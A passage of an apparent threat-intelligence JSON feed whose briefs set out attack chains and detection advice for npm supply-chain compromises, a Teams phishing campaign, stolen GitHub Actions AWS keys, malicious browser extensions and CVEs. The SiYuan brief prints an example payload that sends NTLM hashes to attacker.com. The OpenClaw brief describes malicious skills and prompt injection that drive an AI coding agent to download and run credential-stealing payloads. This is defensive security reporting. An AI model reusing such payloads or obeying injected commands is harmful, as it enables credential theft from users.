Sigma rule to detect exfiltration attempts via public GitHub repositories.\u003c/li\u003e\n\u003cli\u003eAudit CI/CD pipeline configurations and restrict access to sensitive credentials and secrets to prevent exposure via misconfigured jobs; remediate the reported CircleCI misconfiguration.\u003c/li\u003e\n\u003cli\u003eMonitor process memory for credential harvesting activity targeting Runner processes in CI/CD environments, specifically looking for reads of \u003ccode\u003e/proc/\u0026lt;pid\u0026gt;/maps\u003c/code\u003e and \u003ccode\u003e/proc/\u0026lt;pid\u0026gt;/mem\u003c/code\u003e as outlined in the overview.\u003c/li\u003e\n\u003cli\u003eDeprecate and remove the compromised packages \u003ccode\u003e@cap-js/sqlite\u003c/code\u003e (v2.2.2), \u003ccode\u003e@cap-js/postgres\u003c/code\u003e (v2.2.2), \u003ccode\u003e@cap-js/db-service\u003c/code\u003e (v2.10.1), and \u003ccode\u003embt\u003c/code\u003e (v1.2.48) from your development and CI/CD environments.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-04-29T22:43:44Z","date_published":"2026-04-29T22:43:44Z","id":"/briefs/2026-04-sap-npm-compromise/","summary":"Multiple official SAP npm packages were compromised via a supply chain attack, likely by TeamPCP, to steal credentials and authentication tokens from developers' systems.","title":"Compromised SAP npm Packages Steal Developer Credentials","url":"https://feed.craftedsignal.io/briefs/2026-04-sap-npm-compromise/"},{"_cs_actors":["UNC6692"],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["Microsoft Teams","Chromium"],"_cs_severities":["high"],"_cs_tags":["social-engineering","malware","cloud-abuse","credential-theft","lateral-movement"],"_cs_type":"threat","_cs_vendors":["Microsoft","Google","Amazon"],"content_html":"\u003cp\u003eUNC6692 is a newly tracked, financially motivated threat group that employs a multi-stage intrusion campaign combining persistent social engineering and custom modular malware. The actor begins by flooding a target\u0026rsquo;s email inbox before contacting them via Microsoft Teams, posing as help desk personnel to resolve the issue. This leads to a phishing attack where victims are tricked into downloading and executing malicious payloads. UNC6692 abuses legitimate cloud infrastructure, specifically AWS S3 buckets, for payload delivery, command and control (C2), and data exfiltration, allowing them to bypass traditional network reputation filters. The group\u0026rsquo;s operations are focused on gaining access and stealing credentials for further actions, ultimately aiming to exfiltrate data of interest from compromised systems. The initial campaign was observed in late December.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eThe attacker floods a target\u0026rsquo;s email inbox to create a sense of urgency.\u003c/li\u003e\n\u003cli\u003eThe attacker contacts the target via Microsoft Teams, impersonating help desk personnel.\u003c/li\u003e\n\u003cli\u003eThe attacker sends a phishing link via Teams, promising a local patch to fix the email spamming issue.\u003c/li\u003e\n\u003cli\u003eThe target clicks the link, which downloads a renamed AutoHotKey binary and an AutoHotkey script from a threat actor-controlled AWS S3 bucket.\u003c/li\u003e\n\u003cli\u003eExecution of the AutoHotKey binary automatically runs the script, initiating reconnaissance commands and installing the SNOWBELT malicious Chromium browser extension.\u003c/li\u003e\n\u003cli\u003eSNOWBELT facilitates the download of additional tools, including the Snowglaze Python tunneler, the Snowbasin Python bindshell (used as a persistent backdoor), additional AutoHotkey scripts, and a portable Python executable with required libraries.\u003c/li\u003e\n\u003cli\u003eThe attacker uses a Python script to scan the local network for ports 135, 445, and 3389 and enumerate local administrator accounts.\u003c/li\u003e\n\u003cli\u003eThe attacker uses a local administrator account to initiate an RDP session via Snowglaze from the compromised system to a backup server, then dumps LSASS process memory and uses pass-the-hash to move laterally to the domain controller.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eThe UNC6692 attack leads to the compromise of targeted systems, credential theft, and potential data exfiltration. If successful, the attacker gains control over the domain controller, allowing them to access sensitive information and potentially cause significant damage to the organization. The abuse of AWS S3 buckets allows the threat actor to blend in with legitimate cloud traffic, making detection more difficult. The financial motivation suggests that stolen credentials and data could be used for further malicious activities, such as ransomware attacks or sale on the dark web.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eMonitor for AutoHotKey execution, especially when associated with downloads from unusual locations like AWS S3 buckets, to detect initial payload execution (see Sigma rule below).\u003c/li\u003e\n\u003cli\u003eImplement network monitoring to detect unusual RDP connections initiated from compromised systems to internal servers, as this is a key lateral movement technique used by UNC6692 (see Sigma rule below).\u003c/li\u003e\n\u003cli\u003eMonitor for the installation of new Chromium extensions, especially those not distributed through the Chrome Web Store, as this is how the SNOWBELT malware is deployed.\u003c/li\u003e\n\u003cli\u003eMonitor for the use of Python scripts to scan the local network for open ports (135, 445, 3389) and enumerate local administrator accounts.\u003c/li\u003e\n\u003cli\u003eInvestigate any Microsoft Teams messages delivering links that promise to fix technical problems, as this is the initial social engineering tactic used by UNC6692.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-04-28T14:00:00Z","date_published":"2026-04-28T14:00:00Z","id":"/briefs/2026-04-unc6692-social-engineering/","summary":"UNC6692 is a newly discovered, financially motivated threat actor that combines social engineering via Microsoft Teams, custom malware named SNOWBELT, and abuse of legitimate AWS S3 cloud infrastructure in its attack campaigns to steal credentials and prepare for data exfiltration.","title":"UNC6692 Combines Social Engineering, Malware, and Cloud Abuse","url":"https://feed.craftedsignal.io/briefs/2026-04-unc6692-social-engineering/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["AWS IAM","GitHub Actions"],"_cs_severities":["high"],"_cs_tags":["cloud","aws","github","credential-theft","initial-access","lateral-movement"],"_cs_type":"advisory","_cs_vendors":["Amazon","Microsoft","Google"],"content_html":"\u003cp\u003eThis threat involves the unauthorized use of AWS credentials stolen from GitHub Actions secrets. Attackers exfiltrate these credentials and use them from their own infrastructure, bypassing the intended CI/CD environment. The activity is detected by observing AWS access keys appearing in CloudTrail logs originating from both legitimate GitHub Actions runners (identified by Microsoft ASN or the \u003ccode\u003egithub-actions\u003c/code\u003e user agent string) and suspicious infrastructure outside the expected CI/CD provider ASNs (Amazon, Google, Microsoft). This indicates a breach of GitHub repository or organization secrets, leading to potential unauthorized access and control over AWS resources. This activity can begin with compromised Github accounts.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAn attacker gains unauthorized access to a GitHub repository or organization with AWS credentials stored as secrets.\u003c/li\u003e\n\u003cli\u003eThe attacker exfiltrates the AWS access key ID and secret access key, either manually or through automated means, such as modifying a GitHub Action workflow to expose the secrets.\u003c/li\u003e\n\u003cli\u003eThe attacker configures the stolen AWS credentials on their own infrastructure, using tools like the AWS CLI or boto3.\u003c/li\u003e\n\u003cli\u003eThe attacker attempts to authenticate to AWS using the stolen credentials. This generates CloudTrail logs with the attacker\u0026rsquo;s source IP address and ASN.\u003c/li\u003e\n\u003cli\u003eThe attacker performs reconnaissance activities, such as calling \u003ccode\u003ests:GetCallerIdentity\u003c/code\u003e, \u003ccode\u003eListBuckets\u003c/code\u003e, \u003ccode\u003eDescribeInstances\u003c/code\u003e, or \u003ccode\u003eListUsers\u003c/code\u003e, to understand the AWS environment and identify potential targets.\u003c/li\u003e\n\u003cli\u003eThe attacker attempts to escalate privileges or move laterally within the AWS environment by exploiting the compromised credentials.\u003c/li\u003e\n\u003cli\u003eThe attacker may create, modify, or delete AWS resources, such as EC2 instances, S3 buckets, or IAM roles, depending on the permissions associated with the stolen credentials.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation leads to unauthorized access to AWS resources, potentially resulting in data breaches, service disruptions, or financial losses. The impact depends on the permissions associated with the stolen AWS credentials. A single compromised credential could expose sensitive data, disrupt critical services, or allow attackers to deploy malicious infrastructure within the victim\u0026rsquo;s AWS environment. Identifying and responding to this threat quickly is vital to minimize damages.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eDeploy the Sigma rule \u0026ldquo;AWS Credentials Used from GitHub Actions and Non-CI/CD Infrastructure\u0026rdquo; to your SIEM and tune for your environment to detect suspicious usage patterns.\u003c/li\u003e\n\u003cli\u003eRotate the compromised AWS access key in IAM immediately and update the corresponding GitHub repository/organization secret as described in the rule documentation.\u003c/li\u003e\n\u003cli\u003eImplement OIDC-based authentication (\u003ccode\u003eaws-actions/configure-aws-credentials\u003c/code\u003e with \u003ccode\u003erole-to-assume\u003c/code\u003e) instead of long-lived access keys as mentioned in the rule documentation.\u003c/li\u003e\n\u003cli\u003eIf using OIDC, add IP condition policies to the IAM role trust policy to restrict \u003ccode\u003eAssumeRoleWithWebIdentity\u003c/code\u003e to known GitHub runner IP ranges, based on the information in the rule documentation.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-04-22T17:45:55Z","date_published":"2026-04-22T17:45:55Z","id":"/briefs/2024-01-aws-github-actions-credential-theft/","summary":"Attackers are stealing AWS credentials configured as GitHub Actions secrets and using them from non-CI/CD infrastructure, indicating potential credential theft and unauthorized access to AWS resources.","title":"AWS Credentials Used from GitHub Actions and Non-CI/CD Infrastructure","url":"https://feed.craftedsignal.io/briefs/2024-01-aws-github-actions-credential-theft/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["high"],"_cs_tags":["chrome-extension","credential-theft","backdoor","ad-injection","exfiltration"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eA coordinated campaign involving 108 malicious Chrome extensions has been discovered. These extensions, distributed through five accounts (GameGen, InterAlt, SideGames, Rodeo Games, and Yana Project), are designed to steal user data, inject ads, and create backdoors. Over 20,000 users have installed these extensions. The extensions provide expected functionality to avoid suspicion, but malicious code runs in the background, communicating with a shared C\u0026amp;C infrastructure to perform nefarious activities. The extensions target various user types by masquerading as Telegram sidebar clients, slot machine and Keno games, YouTube and TikTok enhancers, a text translation tool, and page utility extensions. This campaign poses a significant threat to user privacy and system security.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eUsers install malicious Chrome extensions from the Chrome Web Store, believing they are legitimate tools (e.g., Telegram clients, games, enhancers).\u003c/li\u003e\n\u003cli\u003eUpon installation, the extensions execute JavaScript code in the background.\u003c/li\u003e\n\u003cli\u003eExtensions designed for credential theft acquire Google OAuth2 Bearer tokens and exfiltrate user information (email, name, profile picture) to a remote server.\u003c/li\u003e\n\u003cli\u003eExtensions targeting Telegram steal the active Telegram Web session by overwriting local storage with attacker-supplied data and force-reloading Telegram.\u003c/li\u003e\n\u003cli\u003eSome extensions contain a backdoor that opens an arbitrary URL received from the C\u0026amp;C server in a new tab upon browser start.\u003c/li\u003e\n\u003cli\u003eOther malicious activities include injecting ads into YouTube and TikTok pages, injecting content scripts into all visited pages, or proxying translation requests through attacker-controlled servers.\u003c/li\u003e\n\u003cli\u003eThe attacker gains access to user accounts (Google, Telegram) and can inject malicious content, redirect traffic, and steal sensitive information.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eOver 20,000 users have been affected by these malicious extensions. The campaign targets a broad range of users by using different categories of extensions. Successful exploitation can lead to stolen credentials, account takeover, data exfiltration, ad fraud, and the ability to inject arbitrary content into visited websites. The compromised systems could be used for further malicious activities.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eMonitor network connections originating from Chrome extensions for connections to unusual or suspicious domains using a network connection rule (see example rule below).\u003c/li\u003e\n\u003cli\u003eImplement strict policies for Chrome extension installations, including whitelisting approved extensions and blocking installation from untrusted sources.\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rule to detect the execution of scripts from the malicious extensions to your SIEM and tune for your environment.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-04-16T12:00:00Z","date_published":"2026-04-16T12:00:00Z","id":"/briefs/2026-04-chrome-extension-backdoor/","summary":"A coordinated campaign uses 108 malicious Chrome extensions to steal user data, inject ads, and establish backdoors on over 20,000 systems via a shared command-and-control infrastructure.","title":"Malicious Chrome Extensions Stealing Data and Opening Backdoors","url":"https://feed.craftedsignal.io/briefs/2026-04-chrome-extension-backdoor/"},{"_cs_actors":[],"_cs_cves":[{"id":"CVE-2026-40107"}],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["high"],"_cs_tags":["siyuan","ntlm","ssrf","credential-theft","mermaid"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eSiYuan, a note-taking application, is vulnerable to a zero-click NTLM hash theft and blind SSRF exploit due to insecure configuration of Mermaid.js. The application configures Mermaid.js with \u003ccode\u003esecurityLevel: \u0026quot;loose\u0026quot;\u003c/code\u003e and \u003ccode\u003ehtmlLabels: true\u003c/code\u003e, which allows \u003ccode\u003e\u0026lt;img\u0026gt;\u003c/code\u003e tags with \u003ccode\u003esrc\u003c/code\u003e attributes to bypass sanitization and be injected into SVG \u003ccode\u003e\u0026lt;foreignObject\u0026gt;\u003c/code\u003e blocks. When a user opens a note containing a malicious Mermaid diagram with a protocol-relative URL (e.g., \u003ccode\u003e//attacker.com/image.png\u003c/code\u003e), the Electron client fetches the URL. On Windows, this resolves as a UNC path, triggering SMB authentication and sending the victim\u0026rsquo;s NTLMv2 hash to the attacker. On macOS and Linux, the same diagram triggers an HTTP request to the attacker\u0026rsquo;s server, exfiltrating the victim\u0026rsquo;s IP address. The vulnerability affects SiYuan versions prior to the fix implemented after April 7, 2026. This allows for credential theft without any user interaction beyond opening a note.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eThe attacker crafts a malicious SiYuan note containing a Mermaid diagram with a protocol-relative URL within an \u003ccode\u003e\u0026lt;img\u0026gt;\u003c/code\u003e tag, such as \u003ccode\u003e\u0026lt;img src='//attacker.com/share/img.png'\u0026gt;\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eThe attacker distributes the malicious note (e.g., via sharing or a crafted .sy export).\u003c/li\u003e\n\u003cli\u003eThe victim opens the note in SiYuan.\u003c/li\u003e\n\u003cli\u003eSiYuan renders the Mermaid diagram using the insecure Mermaid.js configuration.\u003c/li\u003e\n\u003cli\u003eThe SVG containing the malicious \u003ccode\u003e\u0026lt;img\u0026gt;\u003c/code\u003e tag is injected into the DOM via \u003ccode\u003einnerHTML\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eThe Electron client attempts to fetch the resource at the protocol-relative URL.\u003c/li\u003e\n\u003cli\u003eOn Windows, the protocol-relative URL resolves to a UNC path (\u003ccode\u003e\\\\attacker.com\\share\\img.png\u003c/code\u003e), initiating an SMB connection.\u003c/li\u003e\n\u003cli\u003eWindows automatically sends the victim\u0026rsquo;s NTLMv2 hash to the attacker\u0026rsquo;s SMB server, or makes an HTTP request leaking victim\u0026rsquo;s IP on other platforms.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eThe vulnerability allows for zero-click NTLMv2 hash theft on Windows systems, where the victim only needs to open a note containing the malicious Mermaid diagram. The stolen NTLMv2 hashes can be cracked offline or used in relay attacks to gain unauthorized access to the victim\u0026rsquo;s resources. On all platforms, this vulnerability can be exploited to perform blind SSRF and leak the victim\u0026rsquo;s IP address, acting as a tracking pixel to confirm when the note was opened. This affects all SiYuan users who receive a crafted note.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eDeploy the Sigma rule \u003ccode\u003eDetect SiYuan Mermaid NTLM Theft Attempt\u003c/code\u003e to identify SMB traffic originating from SiYuan processes attempting to connect to external IPs (network_connection log source).\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rule \u003ccode\u003eDetect SiYuan Mermaid SSRF Attempt\u003c/code\u003e to detect HTTP requests from SiYuan to external IP addresses with a suspicious URL (network_connection log source).\u003c/li\u003e\n\u003cli\u003eMonitor network traffic for SMB connections originating from SiYuan, especially to unusual or external destinations (network_connection log source).\u003c/li\u003e\n\u003cli\u003eBlock the attacker\u0026rsquo;s domain (\u003ccode\u003eattacker.com\u003c/code\u003e) at the DNS resolver, as observed in the malicious Mermaid diagram example (iocs).\u003c/li\u003e\n\u003cli\u003eUpgrade SiYuan to a patched version that addresses CVE-2026-40107 to mitigate the underlying vulnerability.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-04-11T12:00:00Z","date_published":"2026-04-11T12:00:00Z","id":"/briefs/2026-04-siyuan-ntlm-ssrf/","summary":"SiYuan is vulnerable to zero-click NTLM hash theft on Windows and blind SSRF on all platforms due to insecure Mermaid.js configuration, where a malicious Mermaid diagram containing a protocol-relative URL can be injected into a note, causing the Electron client to fetch the URL, triggering SMB authentication on Windows and sending the victim's NTLMv2 hash to the attacker. On macOS and Linux, the request acts as a tracking pixel and blind SSRF.","title":"SiYuan Zero-Click NTLM Theft and Blind SSRF via Mermaid Diagrams","url":"https://feed.craftedsignal.io/briefs/2026-04-siyuan-ntlm-ssrf/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["medium"],"_cs_tags":["ai-agent","execution","malware","credential-theft"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eOpenClaw (formerly Clawdbot, rebranded to Moltbot) is an AI coding assistant that can execute shell commands and scripts. Threat actors are exploiting the skill ecosystem (ClawHub) to distribute malicious skills, observed as early as January 2026, that execute download-and-execute commands, targeting cryptocurrency wallets and credentials. These skills are often obfuscated and distributed through public registries like ClawHub. The attacks leverage the AI agents\u0026rsquo; ability to execute commands through skills or prompt injection. Defenders should monitor for suspicious child processes spawned by Node.js processes running OpenClaw/Moltbot, as these may indicate malicious activity originating from compromised or malicious skills. This activity has been observed across Linux, macOS, and Windows environments.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eA user installs the OpenClaw agent, potentially from a legitimate or typosquatted domain.\u003c/li\u003e\n\u003cli\u003eThe user installs a malicious skill from ClawHub or is subject to a prompt injection attack.\u003c/li\u003e\n\u003cli\u003eThe OpenClaw agent, running under Node.js, receives a command to execute a shell command.\u003c/li\u003e\n\u003cli\u003eThe Node.js process spawns a shell process (e.g., bash, sh, cmd.exe, powershell.exe).\u003c/li\u003e\n\u003cli\u003eThe shell process executes a command to download a payload from a remote server using tools like curl or certutil.\u003c/li\u003e\n\u003cli\u003eThe downloaded payload is saved to disk, often with an obfuscated name.\u003c/li\u003e\n\u003cli\u003eThe shell process executes the downloaded payload using chmod +x and ./, rundll32.exe, or powershell.exe.\u003c/li\u003e\n\u003cli\u003eThe payload performs malicious actions such as credential theft or cryptocurrency wallet compromise.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eCompromised OpenClaw agents can lead to cryptocurrency wallet theft, credential compromise, and potential data exfiltration. A successful attack allows threat actors to gain access to sensitive data and potentially pivot to other systems on the network. The number of victims is currently unknown, but the targeting of cryptocurrency wallets suggests financially motivated actors. The observed typosquatting activity indicates a campaign to impersonate the legitimate software and trick users into installing malicious versions.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eMonitor process creation events for suspicious child processes of Node.js processes running OpenClaw/Moltbot, specifically shells and scripting interpreters, using the provided Sigma rule (\u003ca href=\"#execution-via-openclaw-agent---linuxmacoswindows\"\u003eExecution via OpenClaw Agent - Linux/macOS/Windows\u003c/a\u003e).\u003c/li\u003e\n\u003cli\u003eBlock known typosquat domains (moltbot.you, clawbot.ai, clawdbot.you) at the DNS resolver based on the IOCs provided.\u003c/li\u003e\n\u003cli\u003eImplement application control policies to restrict the execution of unsigned or untrusted executables, mitigating the impact of downloaded payloads.\u003c/li\u003e\n\u003cli\u003eReview OpenClaw skill installation logs and user AI conversation history for signs of malicious activity or prompt injection attempts.\u003c/li\u003e\n\u003cli\u003eEnable process command-line auditing to capture the full command line of spawned processes, aiding in the identification of malicious commands.\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rule to detect execution of curl/certutil downloads (\u003ca href=\"#openclaw-download-activity\"\u003eOpenClaw Download Activity\u003c/a\u003e).\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-04-08T12:07:54Z","date_published":"2026-04-08T12:07:54Z","id":"/briefs/2026-06-openclaw-execution/","summary":"Malicious actors are exploiting OpenClaw, Moltbot, and Clawdbot AI coding agents via Node.js to execute arbitrary shell commands and download-and-execute commands, potentially targeting cryptocurrency wallets and credentials.","title":"OpenClaw Agent Suspicious Child Process Execution","url":"https://feed.craftedsignal.io/briefs/2026-06-openclaw-execution/"},{"_cs_actors":[],"_cs_cves":[{"cvss":7.4,"id":"CVE-2026-35560"}],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["high"],"_cs_tags":["cve-2026-35560","athena","odbc","man-in-the-middle","mitm","credential-theft"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eA man-in-the-middle (MitM) vulnerability has been identified in the Amazon Athena ODBC driver. Specifically, versions prior to 2.1.0.0 exhibit improper certificate validation within the identity provider connection components. This flaw allows a threat actor positioned in the network to intercept authentication credentials when the driver attempts to connect to external identity providers. This vulnerability, identified as CVE-2026-35560, poses a significant risk to organizations utilizing affected versions of the Athena ODBC driver with external identity providers. The lack of proper certificate validation can lead to credential compromise and subsequent unauthorized access to sensitive data within Athena. This does not affect connections directly to Athena.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eThe attacker positions themselves in a privileged network location between the user\u0026rsquo;s machine and the external identity provider.\u003c/li\u003e\n\u003cli\u003eThe user attempts to establish a connection to Amazon Athena using the vulnerable ODBC driver version (prior to 2.1.0.0). The connection is configured to use an external identity provider for authentication.\u003c/li\u003e\n\u003cli\u003eThe ODBC driver initiates a connection to the configured external identity provider.\u003c/li\u003e\n\u003cli\u003eThe attacker intercepts the network traffic between the ODBC driver and the identity provider.\u003c/li\u003e\n\u003cli\u003eDue to the lack of proper certificate validation in the vulnerable ODBC driver, the attacker can present a fraudulent certificate to the driver without triggering an error.\u003c/li\u003e\n\u003cli\u003eThe ODBC driver, trusting the fraudulent certificate, proceeds with the authentication process and transmits the user\u0026rsquo;s credentials to the attacker-controlled server.\u003c/li\u003e\n\u003cli\u003eThe attacker captures the user\u0026rsquo;s authentication credentials (e.g., username and password or an access token).\u003c/li\u003e\n\u003cli\u003eThe attacker uses the stolen credentials to authenticate to the external identity provider or directly to resources protected by those credentials, potentially gaining unauthorized access to sensitive data within Amazon Athena or other connected services.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of this vulnerability allows a man-in-the-middle attacker to intercept authentication credentials used to connect to external identity providers. This could lead to unauthorized access to an organization\u0026rsquo;s Amazon Athena data and other resources protected by the compromised credentials. The severity of the impact depends on the privileges associated with the compromised user account. If successful, the attacker could potentially read, modify, or delete sensitive data stored in Athena, leading to data breaches, financial losses, and reputational damage. The number of potential victims is directly proportional to the number of organizations using affected versions of the Athena ODBC driver with external identity providers.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eUpgrade the Amazon Athena ODBC driver to version 2.1.0.0 or later to remediate the improper certificate validation vulnerability as documented in CVE-2026-35560.\u003c/li\u003e\n\u003cli\u003eMonitor network traffic for unexpected connections to external identity providers from machines running the Athena ODBC driver. Use network connection logs to identify suspicious activity.\u003c/li\u003e\n\u003cli\u003eImplement network segmentation to limit the potential impact of a successful man-in-the-middle attack, reducing the attacker\u0026rsquo;s ability to intercept traffic.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-04-03T21:17:12Z","date_published":"2026-04-03T21:17:12Z","id":"/briefs/2024-01-athena-odbc-mitm/","summary":"A man-in-the-middle vulnerability exists in Amazon Athena ODBC driver versions prior to 2.1.0.0 due to improper certificate validation, potentially allowing attackers to intercept authentication credentials when connecting to external identity providers.","title":"Amazon Athena ODBC Driver Man-in-the-Middle Vulnerability","url":"https://feed.craftedsignal.io/briefs/2024-01-athena-odbc-mitm/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["critical"],"_cs_tags":["supply-chain","npm","rat","credential-theft"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eOn March 31, 2026, a supply chain attack targeted the \u003ccode\u003eaxios\u003c/code\u003e npm package, a widely used HTTP client library for JavaScript. Compromised versions 1.14.1 and 0.30.4 of the library were injected with malicious code that installed a cross-platform Remote Access Trojan (RAT) on systems that installed the affected versions of \u003ccode\u003e@usebruno/cli\u003c/code\u003e. This attack specifically impacted users of the \u003ccode\u003e@usebruno/cli\u003c/code\u003e who performed an \u003ccode\u003enpm install\u003c/code\u003e within a roughly 3-hour window, between 00:21 UTC and 03:30 UTC. The malicious code was designed to execute during the \u003ccode\u003epostinstall\u003c/code\u003e phase of the package installation, indicating a targeted effort to compromise developer environments. This incident highlights the increasing risk of supply chain attacks targeting open-source software and the importance of verifying the integrity of third-party dependencies.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAttacker compromises the \u003ccode\u003eaxios\u003c/code\u003e npm package, injecting malicious code into versions 1.14.1 and 0.30.4.\u003c/li\u003e\n\u003cli\u003eThe compromised \u003ccode\u003eaxios\u003c/code\u003e package is published to the npm registry.\u003c/li\u003e\n\u003cli\u003eA user of \u003ccode\u003e@usebruno/cli\u003c/code\u003e executes \u003ccode\u003enpm install\u003c/code\u003e within the attack window (00:21 UTC - 03:30 UTC on March 31, 2026).\u003c/li\u003e\n\u003cli\u003eThe npm package manager resolves the dependency chain and downloads the compromised \u003ccode\u003eaxios\u003c/code\u003e package as a dependency of \u003ccode\u003e@usebruno/cli\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eThe malicious code within the \u003ccode\u003eaxios\u003c/code\u003e package executes during the \u003ccode\u003epostinstall\u003c/code\u003e script phase of the installation process.\u003c/li\u003e\n\u003cli\u003eThe \u003ccode\u003epostinstall\u003c/code\u003e script downloads and installs a cross-platform Remote Access Trojan (RAT) on the user\u0026rsquo;s system.\u003c/li\u003e\n\u003cli\u003eThe RAT establishes a connection to a remote command-and-control (C2) server.\u003c/li\u003e\n\u003cli\u003eThe attacker uses the RAT to exfiltrate credentials and other sensitive data from the compromised system.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eThis supply chain attack could have resulted in widespread compromise of developer systems that used the \u003ccode\u003e@usebruno/cli\u003c/code\u003e. While the number of affected users is unknown, the incident could have led to the exfiltration of sensitive credentials and proprietary source code, potentially enabling further attacks against the affected organizations and their customers. The incident underscores the need for robust security measures in software development pipelines and continuous monitoring of third-party dependencies for malicious activity.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eIf \u003ccode\u003e@usebruno/cli\u003c/code\u003e was installed during the affected window, reinstall dependencies to ensure a clean version of \u003ccode\u003eaxios\u003c/code\u003e is used (reference: Impact section).\u003c/li\u003e\n\u003cli\u003eRotate all credentials and secrets that were present on systems where \u003ccode\u003e@usebruno/cli\u003c/code\u003e was installed during the affected window (reference: Impact section).\u003c/li\u003e\n\u003cli\u003eReview and implement the security guidance provided in the Aikido Security blog post to further harden your systems (reference: \u003ca href=\"https://www.aikido.dev/blog/axios-npm-compromised-maintainer-hijacked-rat)\"\u003ehttps://www.aikido.dev/blog/axios-npm-compromised-maintainer-hijacked-rat)\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003eMonitor process creation events for unusual processes spawned by npm or node processes, using the provided Sigma rule (reference: Sigma rule - \u0026ldquo;Detect Suspicious Process Spawned by NPM\u0026rdquo;).\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-04-03T12:00:00Z","date_published":"2026-04-03T12:00:00Z","id":"/briefs/2026-04-axios-supply-chain/","summary":"Compromised versions of the `axios` npm package introduced a hidden dependency deploying a cross-platform Remote Access Trojan (RAT), impacting users of `@usebruno/cli` who ran `npm install` between 00:21 UTC and ~03:30 UTC on March 31, 2026, potentially leading to credential exfiltration.","title":"Compromised Axios Library Leads to RAT Deployment via @usebruno/cli","url":"https://feed.craftedsignal.io/briefs/2026-04-axios-supply-chain/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["high"],"_cs_tags":["deepload","clickfix","credential-theft","windows"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eDeepLoad is a recently discovered malware family designed for credential theft, malicious browser extension installation, and potential cryptocurrency theft. First advertised on a dark web forum in early February 2026, DeepLoad is now being distributed in the wild via ClickFix campaigns. The malware is delivered through fake browser error messages that instruct victims to execute a PowerShell command, resulting in the persistent execution of a PowerShell loader. This loader dynamically generates a DLL component in the Temp directory to evade detection. DeepLoad also injects into the legitimate 